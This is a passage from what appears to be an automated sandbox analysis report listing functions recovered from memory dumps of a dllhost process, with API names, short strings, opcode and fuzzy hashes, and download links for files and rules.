                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: feae79a9befa02bd73794fbeeb9e66503bdc15e1ef8d3b05e6ed7d3095a2e53f
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: 4E015725348A80C2EE50DB12F85875AA2A9F78CBC0F488174DE9E43759DF38C986C752
                                                        Function 000002E86A093B00 Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: 9075b07073775e22313a16b811fb5c1dc7289c43abe67f45632b8638ccd8cb1f
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: 39112D29341B80D6FF249B21E82C71AA3A8BB4DB85F040568CB8D47766EF3DC588C703
                                                        Function 000002E86A0919D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: bbd568375ae247c5d738fcf4c14187593b1fb3de0fed0a8a49dcf9ee61651340
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: DFF044223886C1D2EF608B15F498799A768F758788F849060DB8D465A5DFBCCAC9C702
                                                        Function 000002E86A09330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: 6f6ece8ad2b62840e13be71d4a37ee7a32c1a95d8904781b45671ecdfb89c03d
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 54F05E24244BC0D1EE148B13F908159A668AB4CFD0F18A161EF9E07B69CE38C4C18702
                                                        Function 000002E86A09A258 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: 8b5c97e27a5915618422442b4c87a2804fa9c7c79347ab6acbe81dbc32166d2c
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: E9F0A765B61BC0D1FF448F60E89C7656368EB88B80F442559968F45162CF3CC4C9C303
                                                        Function 000002E86A0954F0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction ID: abe14ad85ef5286f5ecceb258c02e82ea5d24ba747717a0401855bf84e7881e3
                                                        • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction Fuzzy Hash: 1802D536259BC0C6EFA08B5AF49435AB7A4F384794F101056EACE97BA9DF78D484CB01
                                                        Function 000002E86A0A0980 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 000002E86A0A09C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002E86A0A093F,?,?,?,000002E86A09E263), ref: 000002E86A0A0A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000002E86A0A093F,?,?,?,000002E86A09E263), ref: 000002E86A0A0B0A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: 2b63081d98ac17825dff97fd6a8992e94ad50607ab32135f18922eba9f75825f
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: CA81E1236A4698C9FF509F20C8983AD67A8F348B98F444295DF8E63797DF3484C1C312
                                                        Function 000002E86A095B30 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction ID: 612b391ee09ac68a1ed13b8239540926e0bdac57002250f374c0b4a2cf2b8c43
                                                        • Opcode Fuzzy Hash: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction Fuzzy Hash: 80610A76159B84C6EF608B16E44831AB7E8F388785F105255EACE97BA8DF7CC484CF02
                                                        Function 000002E86A0A1FD8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 327ca00819bb8acd53f1ac06ae8871a64ac7b662af68b8d55d8bb677741d6969
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: F7119162BD4A90C1FF581626D49E76950486B6C374F0446F4AFFE0A3F7AE7889C1C302
                                                        Function 000002E86A0713D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: eff8321000ec67bc45d878b7a2d1b3b8c73a6101fa1330f81d8a3361c5f9375c
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 8A117322AD0AF181FF541224E47E3A510596BB5774F2446A4EBFE176F69E34C9C14133
                                                        Function 000002E86A093BB8 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: 1ea0a3f2df70a2c0dd36de768da3b30b9803f1d8226716545035a334e4554a43
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: C9115B2A744B81C2EF149B25E45C76AA2A8F78CB94F040069DFCD17795EF3DC588CB02
                                                        Function 000002E86A093558 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: 35fcda43bd415a17eeef0ab65b21f887dc05b96b9b1e3645c7d58bc6f10e5732
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: 9B117F25350BC0D1FF509725E80939AA3A8F78C780F5050A99E9DA3795EF39C995CB43
                                                        Function 000002E86A0914A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: 433b1656fbfc40a616de0f1e0f59638f999657316f8e7d939f4648549817ea90
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: D0014836640AD0C6EF04DFA6E808149A7A4F78CF80F084425EB8E53729DE38C091CB42
                                                        Function 0000000140001480 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: e678e7cc9e14611d03542dd0f4cfa1862595fdc7699ab0b0d5d92de8e3d459d8
                                                        • Instruction ID: 627ab9307cc27aa497882f47f41db93a5d5935ed27be12c5ef969e1212e8f1b8
                                                        • Opcode Fuzzy Hash: e678e7cc9e14611d03542dd0f4cfa1862595fdc7699ab0b0d5d92de8e3d459d8
                                                        • Instruction Fuzzy Hash: 2B0148B2A00A80C6E705EF67F90439A67A0F78CBC4F454425BB994373ADF38C0518744
                                                        Function 000002E86A092618 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: 001dc0c6e199f5041a95edb17fef4d93a795b89e25d4caa2f32a7fec4b7f9745
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 3A71A3762807C1C6EF64DF26D8483EA67ADF38D784F4420A5DE8E63B99DE34C5858702
                                                        Function 000002E86A06D178 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: 5fdd7fe424a90483edef77df624c8023edb8dbb82ddcccd301b7270d4f17c61c
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: 4661CE31680AD1C2FEA4DB15E58CB6D6BECF755788F246495DACE073A0DE38C8C18203
                                                        Function 000002E86A092408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: 9b1ec3a0877aaf924c5fb45e812809b01f957fb7bc69e800b9b3924f31014eff
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: 3151C5226883C1C2FE74DE26E16C3AA6759F389780F442095DECD23B99DE35C5849B42
                                                        Function 000002E86A0A0724 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: b0a96fca31c3f52cd513c25bb584d8ce4f4e412c14612afbfbbfc6b372672f95
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: B341A232719A84C2EF609F25E8487AAB7A4F788794F414121EF8D87B99DF38C481CB41
                                                        Function 000002E86A09D7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 9ccc65f4b3abec0430f542af05ad4ac6c97ef1603a59f62bea847f0fdff6161e
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: B9110836648BC0C6DB60CB56F48429AB7A9F7C9B84F544166EFCD93B5ACF38C4908B01
                                                        Function 000002E86A0995F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
